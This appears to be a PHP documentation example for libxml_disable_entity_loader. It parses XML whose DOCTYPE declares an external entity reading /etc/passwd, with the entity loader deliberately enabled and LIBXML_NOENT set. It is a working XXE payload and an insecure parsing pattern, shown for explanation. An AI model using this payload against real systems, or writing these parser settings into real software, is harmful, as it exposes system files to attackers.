- libxml_disable_entity_loader: documentation ( source)
<?php
$xml = '<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE strony [
<!ENTITY shp SYSTEM "/etc/passwd">
] >
<strony>
<strona id="cccc">
<nazwa>bbbb</nazwa>
<url>http://www.aaaa.pl/</url>
<komentarz> &shp;</komentarz>
</strona>
</strony>';
libxml_disable_entity_loader (false);
$strony = new SimpleXMLElement($xml, LIBXML_NOENT);
foreach($strony->strona->komentarz as $komentarz)
echo "$komentarz\n";